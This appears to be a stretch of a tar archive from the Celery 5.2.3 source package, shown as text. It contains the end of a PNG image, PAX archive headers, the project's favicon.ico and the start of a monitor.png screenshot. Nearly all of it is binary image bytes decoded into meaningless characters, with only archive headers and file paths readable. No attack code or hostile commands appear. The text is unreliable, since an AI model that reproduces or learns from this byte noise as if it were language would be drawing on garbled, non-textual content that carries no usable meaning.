3%.2PD&&`N-j cҹh+jPO\~سk:d%*6?E%вQ(7bmHkn .1(BQ#Y>o&[e Hz/ߝwyƧ@#fB,&Է.hf͘٨F5A N=I^b:9mc%aݖy/F;=pl4/5ӺXHݐMeBI! vfffEqrr*οa1zcj`}3F_bؚ}yKg.×oYmorޓw f~\ڡ9O_hئ+ębS}Vy1 V =)ˤYQcxy-ˎ&8]@;wDfyy'lv sY @>/Ruc;Ö/&K|y޿nci9{iiSۘƛz޵ըxˤs!;c~cob/I=ݽ>W/ X_fnDA=y0ϛǵʂQTN0B^ݚ뉠BmI2>P8DI& ID(Li/1},_FLJR>Glf~B75Ogl׳#6Ako(}7sgeHTWB_Yu \cT3%s[qzfmNc0FnK7u6+sxSg}Bi>!x#x~G -*8E.DffK0 NNe3vgi\ iRs8#R~#i8sa8V(I}wf5!6XnX{{<}_'odvSzddC/3_hxb}(?F2$ΒΪnV4I-zKXR]/oŀN4ƀO}8}311t.&u&đ5OzԫIZwOZՎshz YW Xi4TvN w 69Dz١1q.ڍ>W&{bϳ~zq4RG'JT̕-0~)+*{8"EF}7̡AH2"Ê}%q}qn, yjjw~/ѵs6g_tsV`38tYr%HjÊwcɒKZľy i!jAmh W{6M}0lME9%lsXm41E&*UP<Э{tX8 \`.y;ƍ\UUGZ*)l4 ]pv~}gPM*z|:%LrU5PƹYPW7y)`l&3Cnpxs*17x'2ըӲ1.4E P3=?d 5cjhjvdVhGH.]viĽ()53G 4%N!e*򾵬:gGY3fEѢ1(@Z-P9džJ~F Wb7Bկ9wkG&n;GPJlc4-anX^IAfL*dihΪQD]!lsXP(P(E&e: [?;f|F"˧,'n K9ܝJiXlt0.n ؗ W=UH 6+"=&[gTqFPlߐgH-o.&UEyt-L&IR+U<pZN]g !Qh_pWYiIDZL 5\197Ń1ݳ:ZpM>X7G(->N/b`jg=9`, Au-ZªIZ2{Aq>P8!!L:XOcEy?C o %3\q;9m&.TVv֯)fZҀk$ ND?n %~ʬ=###Lf)9tx*K.^wZ<%Ǡcn^ƨ `yNDlʏ\”5ˀfzhYL^51zPm϶7Vjdcv'H Yt;~k~s o~ƿti?$^6/ɞkҞz<E(5\-b]EO9|s@OB NXЯoӜ?Bdغep7"H5YV/7F|"a?0viHO1d(N,^NL|"a[d/Xc-KJ!>1͑y JR/?z"1YW2yp-6U ξZl4:ǿ\m:3X ,ե^2sB>w-ՏekdQ8_ XRyz<Ѐ1(m'I<4g'9QuDT!R]49_vx>{IB2w`>|n:%69͒5֧Wn*a>*-r`\h%?9UuK_ 8e( -O&(J n\2nJz[dUD:/jMbı|]ٌ v(K''B^SҊUx({yzn Kf0vTɼ|#͜&cP8#|{X^8efx*(W?glVYӘ瑕l"6_RRγjz;~'X>ֳCbS=׭?s2)zz>=c`s|'W""33bKoqVE9zI5O hSӺmvƱ"ןg]T@N}~HJO)^6 _MX1m#_Ϲ7wb]f}GvNO[sIfpu*-[{2}cʻnxh~|7`qc ,V^*H?ǵpӗ .Ia߾(RL5Zǝ(\ƋfR 8kj%cPؕ#HZ h|R2,{قͶ_25a;gu̹b1qfy}hU ϞŝZ)ۻ'qkjZ<1W5%Z7$O8Rָ+bYLƫjC[}o~9/V7۱WW+;p%:[4q6s䄋ݟ$^٦DeZӾF*ЦZ}QFnmڻot];GQ~m8:R1&J,g2#f :0Kվ~s-Dq`;99hhwPzxtf\w܎(;؜v$ʕ~mz3@G"BQʧ9!;: !5Aa3`r6|=CB!D"WL.!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!Baot6 !B!jWڲX,8AV]*[ҿ4di2ă,&q!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!q?IH櫃.R7={2*pCB!#3Bott=\SttNPB!8d;==^Mbbbu<==U~~~:70mτ *P(wܦbnr/9w$x46US)*(2`uiX >P7j4jŋܼy-[RZB\vsaXwh'eKo#?Q4 !<<|HNeC*ŤϣrdDV )#R=m왵NoAQݛ[W}~Q}qwl䮯(swҙ݅ċ'I@GF3N42Ӹy&7/%nӎ?8q ,cNܼt ̙ & wMgŜ]kVkX?8PdY^, K+ɘ~O*kZרS[n8zs@Q"0gTڴiC6,q죎ԫGXS6\- [ ;8g3Nl& #aΖs4_e`Vut7Q"(NNNWV0(t. x)_5oa.=86Kw:, \ mo8LX{b w \!.C!W@#V`.Ú7eDril&mo/Ruc;Ö/Ĩ?EG1XƸFZ^E+z@~ǔ'v4EFMNjX&]M -xP{Iη,R9qag8̍(q Y a,0ow+P6ܯj6߽G(A`2>#`MqKQh-k')un7L!;ebhgfJcf O-%7SfߨtѾ-:=Kc44r2&raݬ8}\誫LJDyuU~>wFЪP=L\4o*WH"|И}|Ge+yO`KVq@CM5}Rf"3xg!Q> Ee92&ཹ~G|֯7 ,bꢊַ.gֽ2=$wݤ5zX|VΥJ}XҙjF/гs67]4b<^|!8zMB}KF#F[RՒQjFI U^ G*2cyC0E)}PwXwU, 8X3<?$Vu㯌_K_3cff͐C`ۉd%WSIZ4W6oou%}9 yo,FBc […M9DQd(Y%9l4{7+ -Pv[,o˵3Dᢩ&]BTeO2UI#̑39=n#v%/>sxp SRԴzkpn$0Eq\0Z: "'DrX\wÁ}ֲh!}%gUJhG4fI9IoFvZHɌo!}+?DWp1a'h^leo4MIDla'H [v5m>?/ &~Hl76~οL${"I{l?Wpu;)>pXNXԷE!'ăNS6Ǽ|3^^'6Ռ~Re(0sӼ^`| IX>0]]Gox>P8Bv/3zvЩq`,)3;x|D6FQztM;3̚JEylNGll,+V,t;Xt:rO:E2\Bf,Fxl'$>c3>CT''SB򔼶G(r!{`SD_/>xSFewS?F{oxQ= GP`1 8ˬ}PÏLdsE ҹٛWt2^T>QG9: !BrEu|MB!Bao` !B!v B!Ba` !B!v B!Ba` !B!v B!Ba` !B!v B!BaLB[7v:zB!BbnmY,"ƕZݵc]*[ҿ4di2ăcvoS.B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!6 ͘p ЪtB!Ž\<ζ; ͘ƶ;wCB!t.#;ĤB2>MZfeF1<ˆuR_e|C.^"f[vF։v3NMvh'eKO߻l"2kFq#&6m7,e|7B+bE3f鱩TjLu' 7]=pp?5cW֬^hwvɽ:^,u<7Uzx?<͊_GP[=҇O:kB(t8)4 #q@xNLZǥ}qs6E9b9_5A;ef3rks2[g,Jbff?֗]}s8#lUO#x&8gnKBMKas%UIo3i'l(|}J\IE Y /kzN[G;z"o bG `j7uwtxp|7oQ #tl ft,Wb*{N%08Nx&7Xd(;;nvS!#EdglԢ`J =&[N}ą 7_k*سk:d%*6?E%вQ(Z$:_/ᑉOkQd(%92f@]͞@pz('ݩ|w ?ym| a1rj&"kQo2a@}h֌jliQ]!D`gffW''b+ w? x?oj( FS;Ԟ y}vkR'nL~ p{v%O>ћ* g4%SZb: oLKӃՕ|WV\asZ& ĭ[ /,:Fp{tӖ>ej@?z9)fb4؈]gݓkw ˁAbgE/hԨpѫF,Q|[w H4u = Xop)2awroؓzݖ__lCۿ˜~#x?311e>^+w7L؉#[k+9Pz4իJF TS^ i~!TndPnDZ4LCT.T.4tIۋOJ OQh{5| ou}Yы2wY f2J 2T:3j}cn>4&RZuZ6ݛմB+wAfLMU͎ |e41%EfhV3Ҁd)L\޷Ul7kŒ.+a9E7^k[[( j:T96TҸ4X`l߽y~ι(^;Z6,0w9Wb&iIsp8% BQd]V1HIIOeٷqcvzD1OYN?rҹ;Xӆz`\ر/6{BmX,bpԋ7gdpF1Nm~:%!ZTLa]Lzq A&=s. uF=IcTj*t'@_˩4d? $qE[DZz{PY :x32{VGniKE^>N/b`j[wj]!2sZ:К}Bk:VIԕݟd(T&hEy?C o %3\q;9m&.TVv֯)fZ# BcJ##Lf)9tx*K.^wZ<%Ǡcn^ƨ"*V܈O$".G4 5˝kqw>P8Bv݁oY7 } Of+{7@q]bp\9w0.Bݪjꥯy{^>nFdn~2)@l=fVPp碖uF٬ç1.dy+٬Em ga(zw.T{^~c'+*CHO2ȯ1ռ} MFsNWmn/7<2dJ7t*|ERzjNYOW/6n²l:.{9TTh i Zƻ֜@\]r.οg77kN 膇9w7Ͳj᥂s\K/x==}q6y[k>R(HɄZE리q܉•j(֜T-*eɖ1(- G(q 8ѪevYm˿ej4vkž8FJ֞bq _z\8wG\h΃5נ^tCgsW )X/iQKyuRɀ^$cQS&#@pBǝ*bmMe^\>}hU ϞŝZ)ۻ'qkjZu<Q۔h[q}p qWezWy9r1{oьM|ϵ..vxQg;#]^3g:WhMfcYϫ޵4󣞍.ɽ7+]l;a_>d(C(2#8YfL}q:~rS?Ih4h4C[u(s v\<:3_;nGρld;VJ6aCB!(@Ӝ ^g9{]> !C!\c]q?G !B!v B!Ba` !B!v B!Ba` !B!v` '̙&GoB!BQ8K4kEGڭ!B!_q8Rh߮rL]!B!T,hHYg`WRi12ߺ+#B!BNNd$O%5*BaF3D%͔ђqK!B!IРu׭1]۶X,e` !B!"B!B!Al!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B!$B!B!@l!B! G!B!Bg с!B!F'`=pё!B![bh ::2!B!8lN?1NX$IENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/favicon.ico0000664000175000017500000001027600000000000017221 0ustar00asifasif00000000000000  ( @ O1w U4S3V4 V4 V4 V6 V6 W6 W6 W6 W7 W7 W7 W6 W6 W6 W6 V6 V4 V4 V4T4S3 S2O1w `:tFvHxJzKzL{M}N~O~OQRRRRQP~P~P}O|N{LzKxJwItGtF`: [8_zJ{NR!S"U$V%X%Y%Z(]'\%[%[&\&\'](](]'[%Y%X$W#V"TRRzMyJ[;_iCzR"T"V#W%Z&[&](_(`"]&c.j2n1m-j(e#`!]$](_(_&\%Z%Y#V"U!SQiCzjDxV$V$X%Z&\'^(a(a)fD}OOyMuNxO{PME~8s(e!\&^'^&[%Y#W#UUjDxlFx X%X&['^'_)b)c,kM?lZ9,+ ( +. :,-OA=jYKqQE~.i'`(_&\%Y%WWjFxlHx!Z'[&](`*d+f(hH2VH;'B->*9&=(>):$0%:->gW@q*f(a'_&]%X XlFxlHx#\(^(`)c,h)g9y?{d# E0?+&- :,.! ,=) >)8l-l)d)b(_&["ZoHxoJx$^(a*d*f-k*kA+WE7"F0/2kVHCC@v8}d+[H6)1fQ=~*i,i*d(a(_#]oJxqMx%a*c+f,j/n-qC#L: A) C+"J8M858;?CE6~d;u3w.n-l+h)d)a%`qMxqOx&c+f+i-m0q/uE#L:E-B(/_LJ5:87556;5}1v0s.n,j+h*d%aqMxsQx'f,h,k.o1t0wF#O<H/ G+._KL8;;::974~4}3y1u/r.m,j*e&cqOxsQx(i,j.n0s2v2zH#P=N2 K//bNN9=<<;::864|3x1t/p-k+h'fsQxsSx)j.l/q1u3x3~I$T?Q5 O20ePP;?>>=;;:764{2w0r.n-j(hsQxuSx)k/n/r2v5|4K%V@U8 U60gQP=A@??>;:975~3x0t/p-k'hsQxuSx*l/o0s3x6~5L%XBY; X91iSR¤@CBAA?=;;864z2v/q-k(isSxuUx*m/o0t1x4}3K%ZC\= [;2lUSĦADDC@?=:9642{0u.q/n(juSxsQx)l0q4w:~?@Y*]F^?]=;pZeβSȫWʭVɬUǪSŧQOLHE@<7z2s/n'jsQx-dx?FILNNf/^I_?_?>r\lӷYͰ^г]ϲ[ͰYʭXȫYŦVTROMJHC~<|+bx7oxHKLNQPgå/^I`@_?@t^mԸ^гaҵaҵ_г[̯UȫOťWɧVáSQOMLIG7ox9qxLNORSTiƨ.]H_@`@@q[~WӴ[ѳ[Ҵ\Եb׹nھîoƪUßUSQNMJ9ox>sxQQTWXXàk̭6cP[;gI Z;{ɵ{^uG-dkԱUXURQOT0Z8`=1VDwǬ\ɣ\YWTS@uxDwxY˜Z[^ĝ`ɣa˦hԮoƪ:+O/gHjKdA`=b@fEgG]?E(+6+fdѫ^Ş]Ü[XWDwxFyx\ƛ]˜`ƞbȠdͥfϩfЫr߸m(H;(7A$@#90/%F8Crb`sбkհdͧcʢ`ƞ^Ú]—[ŚFyxJ{xaʞbƛdɟf̣gШiҫk֯k֯uyںgYUwW{\fr©yع{vlڲiӬhѩfΥdʡbǝař`ɝJyxL~yc̠gʠhͣiϥjҪl֮nٰp۳o۴rz~|wsoܶnٲnٱmׯkԫiЧhͣg̡eǜa˞L~yS~Ylթd̟g͢hХjөkլmدo۳pܵp޸o޷opppppqpݷo۴nڱl׮jԪiҧhϣf̠bʝkӧS{Yp}߷zߵ}~~}|yݳ|޵oxWtqrrrrrrrrrrrrrrrrrrrrqtxW@@././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/monitor.png0000664000175000017500000043575400000000000017311 0ustar00asifasif00000000000000PNG  IHDRN2 pHYs  IDATxw`չ-UV*w\1B I.rMIHBބ$7{IHZ0)Hz[g?vgj%KlIIΜ9{s挞F3 \citiX@蚮 3c;}j<7Vūz(=ɷbHӪ7{,vGGO)K{Sb7_|DZb7{,v5Me[V億Z[[4{waJjwb *]]3:lO1!V>Btu3͞j1GyF[/b_/A;>oY~(Xb VXP\ UF]i7Z&f5*q0*b,MjGQ+V7NL/b_/'hFtDdW=#z\Ԃ7 ~7 ](]UU CڕachDϬXՃd2R/Zgޡb_/b_/onn;n~8bA+--5 + 3{C! ԴacUX&FT }êeSzJ}Tb_/b_/<7/]xl6[HCCC^zi&މX='j).VbU13XQ"ִXST L7LbƫơM~ĹX\խjSoN_/b_/sss)++ 뺎fڬ/ZԂP3Uh ?5V0qEzt<5Ō+EPkMio8oX7N,jϐY)kbUZI/b_/뤥E3z28`W3iCace NUQuqtUL]6 Qѽ5'o㱦[DW:xV3NߏjTAohS+dt]Mb_/b_/<'>>ۍt¥^7}X= ?D5IWF̘:U$z*V4It/TcĨ('! 9xWk= 2'?TMqG6EW\3]5hb_/bpǎvq,Xb\.cƌu?33P{@Ԟ5џӡf&Pi%FT2uzcUVUAկV@{tX :MʟyY%'Vڝ Gtn5b_/b_/XonnpĴjj*{trEȑ#ٻw/cǎ,{f"`TQT"Uj/KIY1 F@LmfYDXPib_/x nVijjwޡs9s9x^/?gCM,<]eZ͌jl35u>jδZ0qnu2`+`t7Ybxfl߾QF1zhB7 ~Z[[ٻw/cڴilSWn">=UhrSXjU2ӌ~y_/b`ɒ%p{1tPسg7bYn߽{2 ZvXɾMڷ5΄I2$q6 iٴC{6Rsh/Y8c1v\ӳCFpffkkrvΰ#7|g>M"zL}yXxظq#s%// z6u^a7]{QTofpA>3NJ|||D2{swհ(=X=f{>LxxAhc3]=tb_/Gg>x8@AAx<|>~o~fP=*qxvV|=2Ngxr e3jJKI&uȐ.{tT[g8mrL/cTvR}JUm )euޢg>ٺ -`| RjduTT&=)!Qu1ct`0t埁nD ӻ8qeװ~DLKK#>!;vqtu z 3azUэyMt~Db=ռoTQ}'>c_/bw^pxu6 jkuBSUk_zMzlsfk8rҏX$efөU4԰W`ϗ{d;s oç|o^;l R2rH UL6%߼ _TnKy`|Ő̜|PA=<F`s]Ɉf'{NO/&- 4Ɋ~GEmM-gĈjIq Tm,YTK Z/3AL?4@7L3bDS #$i+j?O8 :ohh jԆlB9Sz-m6XOzz:6-1b>hSFtz,zݘڛIm_{ocj]&Gjն7SGUGEt/i_/bjl6^u.2RRRzd0οi^ۼ z},Ng ˅\In ]bFoeRA )N@R Z\`uom&%ɤފr5'bf)M,SM38MKG+ ) 9-\]*pĬ FS9|0#G 114uN,Yo󂣾kPhh8F5SMt5 C5bi:Z15ToL#Oa}oȑ#)++cԨQi0vX:=|פj̇HGG߿;WC5 5\o5~{g>H͎ uzjx-|F]}yFgݛ?zqqqdddt:ٿ?aЩjۦjUvl4cbNS~tϵ:K}טzzר)amUHWəw5-iWj_/bַ"t~#ߝmjoj32{p쵈b5) LZZ,k{}!Ѧl|82`OIFs8liaE5whhi1 ]q%%O3550Vv+ -MK|s'{<QWWGVV)))x}` Qlh6̚5+TV3~xoE8DkWc >p'0` N.OBc:zXӨz`t7xngUg7oTz7M60~bc6"!R_󓒒BVVUUU0?!U{g3l0*++III9]WGsG?8{|6W4]brC>Վ.Z^}xw>3 >m3b_/'kjj"^mXwkH H=jHO ˀԔ `o𓔑wT_`LF̰D$, I`O ۊnoEh&PEb~(@oou$ŞB5v;f|>zNnЈB5ݻVvL***>}kdkx㏱X,$''s%0q@7+ u7 2V$ ^H'7rk9ͳ @д(/Z Rpw >-0Mum۟'oFRFnu/삀#jOihz[?Ag>Z1o3e!G[{=^l p:0 Ŏmۙ4e v-~`L6oLvvvDcc#2~V{6Dm,QWWGjjj^fuڙ@o^kƫNR׵٦)sf6B}HDO3~=jI6[CEnxU{ ]Ԉb_/#ox<?U%OLUgeC 3+Ղ5v{-LXH5㺮;UlVhd G`͂f 7n/y;2c(߀CœjO& lZ}gjf<m޲!N3~32ѰGMQ't0c7Lǔh鸢kd aHNaLװc:Z(}hycN`E 멯GL24[RSSgzΜ5+~G^~k>[t***"f6&}۪6رԈ^pA6{aVi&DEFG?JuJ3zMK{j臓YjfXo3?^͆%b_/otP$=,q͂71ȑlti/=#)=)_F-9lqNY|hiQg cJZ>< u_%BF eV4 PuƏ<4-;+1`[ߊ;+I##v f^u]ؤ¬>rk/t.Q{{0t0 Z_0S2膎#!)g b`xKųIMI%uY[ ;XbRSRHM=羬0@̓-7 %%_C۱oϾ˼N@ 77TRSSqX£сշJJj*=<ڡlůi-ٛA7V|-jà|ߙBJJ*]psw%%55?ljVG?z00m0}tS& L7t=Їϛk`{(\ SL&99ͮ]صs'nd&Oҥ~?ИQ]]qArr2uuuz_ 6nJss3~?MMS}zzs|P<UMOu^o'-yR{g5ת=ee7_c37uJ_ͫV7QŚjيb_/#oS#Q)=fᚽ# B*?]ͪ%kY+hP[YE<ɉ 3gzzX\;O$TϾE^aYCP[]MEi._Ù2aN1󐚘άe6}C3$_Uu5ar9&w*LF][9sY%\5Ex!k;4BxI|7Ej.f _a}oPu`te?d( g߻ingpPAG?gxkafg7LaӨ$Kv:fԬnSr8{#WK%-\ nɊқZ]An->aỎ,QPk57ÚQvCB;䛃j՟?.Ɍ3رsmmm8NƏBg̘1|dggG477j1j;74zXVV"555U{ü7RWf3Ak3zeG?Lv3/fzt15_#jSSh2 jm(b_/M^!0H>lvP^o@rN.'>~$$aP)<-k$)7Pv}FS H9c'x"zb.u_p}TġWle@ı&_w[~:5؁ BِnrގAڨ ktgtt:Z TV{UM-f=]KՇZ~ѳԇ#BiADz1h;?3ܑ7ӎ%b_/͌*T3r5nA9s]n7Z[;Ki Q:::ٜ;QS.nc5 6[[CטV+yLj3}\Ξz|455j>q¨;>iqXV\nT=?MΟ:?暻N#yi.2nI p2k ҫ3 F` poyOG*  lp)|f&ش(0k5shkdrp/P3Lxہkz⊯3:1c ,# irh(}ĥWFp7zhn7֯_!11֮38GK>#(++cȑJJ UUUe&yV95,jkk gfC _MV{VTf{QD1wܪLSUVרźԥoқ_`FܢPez"b_/{4 Ӣ(l7C5ArBPf㡩)TXT3 yR+jT3>'iӦo^JrBiL8{xXLus5c2f{ (Akck .̟7|Doo"'F|r :b!͹^͜_-#Tt098;~?vcLHjefwэp}<38'ܫ/~͜_-ga [)i) SFkջ-H/rrrp8l{p.VϮa$$$Jfff}0{՞|jj6jY 5jP0598u0jp4ѳ|W0Rgx.XMU/b_E!P'zzZYpffpjxΙ?5]3F3ѽŦ&uk=V50SKy8*Tm{Go3?b_/b O?5 S"hCW3jv56_Lͼ*zBW=*jPkͱa9HOM҂fhWu8u3Wpm58!ܗz5jhm}VDZ~єM|.\~Dv-<ރW~{?OEɬ[å)((tWTTOrrr̩Njjïmii>թboWe޿Sԇ𫽵jGڞ=f~?#ƚר=jYb_/y?3=%jEѽ53芢yԡf4=Fj{i/njS2:tsfF 17 퀧ڣ'|kȑ#lm6^u^xS˹.#{0#q`ql)!1bgҝs//gv#3{no 5ik8⬘E oOD؈۱YyHocկG_l!C")//'11qmN_mpPZZJZZZj+_Wè[m#*u^oƭV;K6]}8H/b_rߦFh7P :fՂ0 #4zh܈!L܄ԣjx3fύZjOa 'fZQ̼SPP@Jjj` cWaz 3'0E捛Z=kSfUt*;Ͻ#fQ]sD9 x^M8a(> :ivСC)++#???#99bHLL$>>Ө~)Zttttjg7Bgؚ'gm7Y}ਯBUj{jVҺY ԙNWuI/b_r0 lѽ;iFi^cG4)0 D"b*j%Q7~PcݬTf1 ̻Y15kV0n=T :fmg=]=0 :lu6nHaNώ,r͹2H۵~+`8C b3#s+]ِN2yyy4N'TVV^iӖTmT133.[^}kf loٓnƯnުݳ_/b䷿jEO U*ؼ03m~FAH ^5茪יwf%11 Aթj4_)]^/@<8@^nsΡ5j10jNU~~aҨp."Rjt2x_V$V^Eyy#Fl>]f@Vyƚ=f>̶,vX56\fϯso}b_/'-K7ř=fmo32Zp2a:M0T{+F3驽Fj05aTcy0uS_***4矏n=8`>סU-ajZ0~l -48VPݬ`Ba.x2e;8 +E?OHÏp{܌1b@M5{W=jjyCn^g6fj~X]ץFc|fO:N_/ba;~fF0.SBQ{LA=bN;QSKR1ִ5Sf3}1uEzS,kؼy3,8o)ɴaΈMauu'L#9)aÇQRRBii)IIIe;Rg=!VG SmcțEOiS̫!ʵt5ib_/On|>'|0#5+GP\݌@ɱufZ30Nlf\aV0^Ӑj^+Dw⥧3vXƍi444bY⠾,0AC2BJxֶixu5(upMw(9rQȂMaFp4VSuEx<˶mhmmPJ}8 ] `Uo8=jj6gSt]}b_/'~?2B{:;ݢ9=!GlK2[?>>&%    @;\Vfh7ӌaPF etQS+XhͰp0+qک5f:YIC#.C_~/E_~/EuCQɜjH#x ׎iX L`tE` ,8!n(WE_~/E_~IhՆFHd'@{^oH}>W5 G_~/E_ V+Doz"k p/:jpTfo; A;U JˠЯ:c$&&";   nIL{K lkJ飱-  0())aadgg3ao+C=Jaa!l6|>}7nJRRbT=p̀iZp}=,h9=iix^Vk@z~دY#9G_d_AA#S\\¤I8q"~)>S=Nַ8p?ihh 55Z{]n& ,M0 @GG7 Cm.`c>Z /K^^wy<7> wHff&^ }Q|u,N0%54_ª݆9i%nn77>/UGIi --ڼٹږ@-Zzq^_Jj?YJl /7XA  `2Ə@N(..qnȐ!C[uIff&WFF[maDcDmD`ٲx&>>ŋIHCNanlyƜ&ԥlvN ⨯nF/I||sH1fѝ2wx!.]3^p˃H̱ps 7qBO!m.cSbX8~?V/ +@xUM݆%| l>}   V>lق AƏOVVV9sxyz|~ +[obDk:G?\!555\y$%%villt#ޒ/&筷";;$v;/&11 @ഄbyX,dɦanS__O\\.wFuu5eeedddpg2iDB}>O<{!%%X{%IL7HvE͆׸<WW4o}/>y/޻-Ï?iP3y֝l=O»X#̻V^]{8[GO &v[xbX|'/y: iޣ.>+Jəsx9?y^_bS#s.yüWPM-f~aQb¥wq.q鳬Ҧr}3?f'v_aϳ?ϥ}sX4YS dٖ3ZkJewy$[+CM ?=,bYsY> ?|p'+.d|2\" 39 8wr!֞7iêFaqٗ(6-~#g{o&o?/w½H_3׎xYyJ|ϒsuܻO  G!.?QgpA{|XngJv.N`ˏ'U̼\17k#q5UиcO(dѝw2[X7.߯na4?ɮ}߀|WM\--d̽)@y95wߧy|[o=ͧom?ލߝslk,x|{\zbL[ l_&=ιiH3zC=d? 5SowwNJ9/Qz`?̢@}1o<{j<#-.86K=L11]̒Ops_Xt_g7Ŋ/qs1-+   !tMڵE 9ݡ:˗/OpSPP)9 HorR^{-K.%11MӰlˁ=7S& ,zhz&];g n_||%sl6fXp#w D/yn7˷-~w"`+4[S 6m^CS^]f0y4͚ϭ;g+hyl] 93Ɏ^χH807c3v&$- u]6>L6gcsqg mf iS+  p2~8?u'8p@ᛚߟf׮]sݜyM? /k%>>>4x4Deˏmg5<Axg0dHӟb 6lX̼NuU/C)996a#5/GMuuux> jP3|H=᡹bٚ53&Gд/2;woc1qPW=Ɍ~z2`( dO^lF{֝4f%.Cw\tӥlVNn5p߂)Е>i]<Yt`du:1'౶ѹ !?64ᆘfg;wi  #2]n^zeۍ㦩Ç]IMMŢiS?B!iiiaذa2?m,[jlڥ~C}(~d7ϬsLv„+|Y k9{.s@uA_X{|)|N^pUO?_?pX{zc'LINPgPӂY)6)-͍]Ê;q/ [ՔRQ߆7y Κ7SZZ吝b+,FymFJ)dڨ#/M? 1koobyFz>Gx@LrF86ctO;+pk:]  u봶1~#n0ÇAzz:n38ۍf#%%!Cꫯ'ڔe ﲯeҤI|+_ncC]kuZ9֔Z e= Ng`jC7 x!緿-+ڵsΙC,jkXz5[n%g|y+F3f[M_4?8~<-\9f<@EO|M|70,zO  W)_`?ȠRJKK),,dx7p%ϊ+{fԨQP=dq*++1 [nQF7 m˖-fY^C]b7ٵ΂ s %~尹O@8u gK0k!~N\G׃ Q߷ ]Э/   xxgx}Y̙3ާ;3w߿8}j )))TVV m͆E3730p`S>MuZu"0G"+ǔu 5 ԈkuZp} OdsHKK;XAAA8Qx^>\aÇkXz/-b/zBB i4?2+BCSCFDTn._!   n***)t:{"ĘjF!‘GWZxc?%`M s} 7_In6ˋ|m^xc?33۷PXXڻ@AAAx^*++ٴi3Æ' W۴i6b\Ko0 D_b Gy&".%op7 J</~/EД >E_86k`J~fV&v}7 =0&(J"މ5F8YeM|893S 4\FС`" "FNN. 'Ox͚q?Z&jQ~#U3q)%@G_~/E_~/E?tttHÈXP'5 Y̥!1oz",~#{jA1o( J#&ۿ6С"5Q?SD0ԻlHbh(y_~/E_~>a7bÿ`/ *Lu|#PZ0L@%lkPT@dM8ᰠv~/E_~/Ekچ 50h  )NrBJz_~/E_~70 C 38 C0:'^k(i76T{-Q~/E_~/E+W_}U9/   ')a`;TA/%-AAABbAC,iSAAaj/ЇX-   !#8 }E_AA8,2/ЧXd_AA@!A/  $d?Al'  $d?A「   O8   'b 9$k.pܐi  @OO:\Ǥaĩ-WDYot}OOɅŗ?$.BجT<~>t pZ|g:S~Z=5S Pʩ r0|Wʉ':'VZtIr][exTyHOaC7045;lGӱ4gAQ9;muČp2|^$fhu  Bsμ$SEX"5n6gqWxg'YH |ʛs!Zѵn;.-nۿ Iu$Cu]>GK^~/5⭒Mg0d,yi= m㣕P9pcyI3Ia @bհYiZ’{)m"gMC?ҥj{#=ΜL]Û7U8B*+_ޯvEk܌Hx? n>r,~,l6lZ5udfT>gqv|1JGMz6y]379;:K{t  ')xÿ jXKX{+rBSh.7xeQ̪U`CCjGq_]t7OV0.l6~S?KG¼Iŭ'S!k!9#"v;km,vv%];mfru1Է#J>ƹyٔz6npmWMvǧ'=Լ>zG7籺x3MГfr֘1$Q]F"ǞФ-IaH&=5$ =T V'6Wr7 (LrrFd$O)ޡ4ƞ9lhMƣJ"!um.3:U]2 k(bop ~tOy yW1}4Z뷲Y39mH.&?@x~C%> ~- 3Hڼ5yZ8\;xiXqJý~XPǁƏΰx^!I 9^Mah:XGłXLs[ Thn75iP~B/g A6%[=^+Dr#*i;\TWK'#'g\;kx_q5áx zCfikѪ)дl-[``MNvtuPy9q9tERj 5/‚3_XQ#ǁUǞm]ơ*Lس I:i, u 3y5\]%UwQ-PLK[iCHMukANd⢩I ޶P]령Cv dćtG갏E[e3nBU|eXXBljjJYniL;^~~w1+7.= k;v/_Ys+ӋggaN+*`DT>k}YfR1ia'sla/=c*Uè fWe-Eu+Ɍ*qp/I vU¢1n߹!%oGvg<Y-cm2Ƌ_@K߹8v+1^qv|X٦?$!9-q`sק6,&omx|^U2V9c;ٲnGXA 8M|-EC%\yՅdgy~v.#Wujku ~5+vs2}|ʂ%7/;}7r|k3/=X{&h- !xek^gĥ_a)PZEݶ=Ӆdl_9clF !!LX tnu&321f]'. _R|/yhVcw״밹dXwoLxMAas\6z5b2ҁ`Eĵ>{E5!\8bfME+V=+h>m)C0ܲc 81۩YBz,c`D8KvVOVO༂,N،$nۆ =|"qmh$+=Q ٹ GQVpIu1OA=[VB;5.&S;XsG5ǟr/Śy6SbC$Ma\hDi\|T?7|e*_?ǟr5yUZ6j҇_Ƥ&G|isc9d q ߦ_?D7gΜLsr:D˘v"GمΘ ]Gެ@mzRfSZH~:Rm׮Ǚ5s 8X-q .'I۳)km\)ΘC6ךM58o5u9Da78Oӡm'ծN]ДAt즲dFZJ2wQ/[n9֜1K;6gr[CMi.d9|{XA)Gp?W~GEo&k: v V7Ĥx]nGMme[- pj5f\6#_%,=)%<i)`D®chNpeKE[Xo5eVfSGP~ ʤwcU:j,Mԝ]SYw|ɜKILJҸ2eLOQƎ,Fn&ΝXCtSZ>o;0)4Y6lZf#[Ph]IOcsQÊed[;PY ܴ]cݤ8zџB宧xmZ4ࠞ";ۿŨ1"3d3fvH7غg }tXz@Q:L][^\G/L: &/s4t1A({7ulm6 ga$M<5m,eT9b6VQyU9(,+_ `' )gH(6eE)-$O#y72tCGos3an|~SŁ;vzCйl{ʉcٰʪRsh`l5KK3ʼNn;}SGd7_ӂ3m_g2lk?exOAAAa͢ȿ9}ȐIXv>pMuUњ5}&3һ)hRz~Q|9ar5șPxkkf34s*MtEvNMZ)ӁX5 V*FatvGA"wK&1,s2ڇ$N 9\]ɤQ? 8: ٌȟ Po͂8{?t"[{f vӡSs#тr*'zDج^; juu*ު9ÈYLgt:$|gNIkiZ-AVC w`V#r˟BDjVk=M R3s*VTY5Ge}2+8c[kbZHLpViȌzHNfYz m̸Pwd"+e'{y~ICRi ;h,'`,>ov41twO۷JsMi{k?9Kii9_ 0`|tS7X8g|8'T~@CrN|@/z3t.q0,(Sfz`CրoxyEkmn31:/z#3.~Yyylh:vy@Ysliji?H$nH&˒6_vME PguGxioc 